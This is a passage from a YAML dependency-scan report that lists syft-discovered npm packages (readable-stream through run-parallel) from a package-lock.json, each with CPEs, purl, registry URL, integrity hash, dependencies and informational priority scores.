- cpe: cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/readable-stream@3.6.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz
integrity: sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==
dependencies:
inherits: ^2.0.3
string_decoder: ^1.1.1
util-deprecate: ^1.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9230ea38673dd70b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: readdirp 3.6.0'
title: readdirp 3.6.0
description: 'Package discovered: readdirp 3.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: beb5f9a5d33de00e
name: readdirp
version: 3.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/readdirp@3.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz
integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==
dependencies:
picomatch: ^2.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ec316d1c56cfd200
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: recharts 2.15.4'
title: recharts 2.15.4
description: 'Package discovered: recharts 2.15.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 98e64f0b2bbef0ce
name: recharts
version: 2.15.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/recharts@2.15.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz
integrity: sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw==
dependencies:
clsx: ^2.0.0
eventemitter3: ^4.0.1
lodash: ^4.17.21
react-is: ^18.3.1
react-smooth: ^4.0.4
recharts-scale: ^0.4.4
tiny-invariant: ^1.3.1
victory-vendor: ^36.6.8
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 249969671e277623
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: recharts-scale 0.4.5'
title: recharts-scale 0.4.5
description: 'Package discovered: recharts-scale 0.4.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b982e93a08325fbd
name: recharts-scale
version: 0.4.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/recharts-scale@0.4.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz
integrity: sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w==
dependencies:
decimal.js-light: ^2.4.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0c07927a54487fe7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: redis-errors 1.2.0'
title: redis-errors 1.2.0
description: 'Package discovered: redis-errors 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c6c6f81fb8ed6f43
name: redis-errors
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/redis-errors@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz
integrity: sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 38d5b601f3f165a4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: redis-parser 3.0.0'
title: redis-parser 3.0.0
description: 'Package discovered: redis-parser 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d5b8e01dbe4fdde4
name: redis-parser
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/redis-parser@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz
integrity: sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A==
dependencies:
redis-errors: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 73e41b20b413651d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: rentaldrivego 1.0.0'
title: rentaldrivego 1.0.0
description: 'Package discovered: rentaldrivego 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 784a87ea0f6f2516
name: rentaldrivego
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/rentaldrivego@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7ebb1ff31601df05
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: require-directory 2.1.1'
title: require-directory 2.1.1
description: 'Package discovered: require-directory 2.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ae03eb850b2a6844
name: require-directory
version: 2.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/require-directory@2.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz
integrity: sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ae7e8898d2f0d0c8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: require-from-string 2.0.2'
title: require-from-string 2.0.2
description: 'Package discovered: require-from-string 2.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f7f7aa302949d36c
name: require-from-string
version: 2.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/require-from-string@2.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz
integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2d09a802d546535f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: require-main-filename 2.0.0'
title: require-main-filename 2.0.0
description: 'Package discovered: require-main-filename 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 791f53dc42a97604
name: require-main-filename
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/require-main-filename@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz
integrity: sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b3700e9b1b03966b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: resend 3.5.0'
title: resend 3.5.0
description: 'Package discovered: resend 3.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c52cdc280efaa4d0
name: resend
version: 3.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/resend@3.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/resend/-/resend-3.5.0.tgz
integrity: sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ==
dependencies:
'@react-email/render': 0.0.16
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7be6d0329d7fce71
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: resolve 1.22.12'
title: resolve 1.22.12
description: 'Package discovered: resolve 1.22.12'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2e445c7ed78482c1
name: resolve
version: 1.22.12
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/resolve@1.22.12
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz
integrity: sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA==
dependencies:
es-errors: ^1.3.0
is-core-module: ^2.16.1
path-parse: ^1.0.7
supports-preserve-symlinks-flag: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3f98609d8855980b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: restructure 3.0.2'
title: restructure 3.0.2
description: 'Package discovered: restructure 3.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 05272d1e7e2ad4be
name: restructure
version: 3.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/restructure@3.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz
integrity: sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b7f5c38e4c9ed33f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: retry 0.13.1'
title: retry 0.13.1
description: 'Package discovered: retry 0.13.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b8be0fab008ab183
name: retry
version: 0.13.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/retry@0.13.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/retry/-/retry-0.13.1.tgz
integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b8976a72aaa61b4d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: retry-request 7.0.2'
title: retry-request 7.0.2
description: 'Package discovered: retry-request 7.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 672814322994feff
name: retry-request
version: 7.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/retry-request@7.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz
integrity: sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==
dependencies:
'@types/request': ^2.48.8
extend: ^3.0.2
teeny-request: ^9.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0d600ce535ab6bd3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: reusify 1.1.0'
title: reusify 1.1.0
description: 'Package discovered: reusify 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 456353a253e18966
name: reusify
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/reusify@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz
integrity: sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3a557f6b562fa305
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: run-parallel 1.2.0'
title: run-parallel 1.2.0
description: 'Package discovered: run-parallel 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ca5a4d8be889885f
name: run-parallel
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:*
source: syft-generated
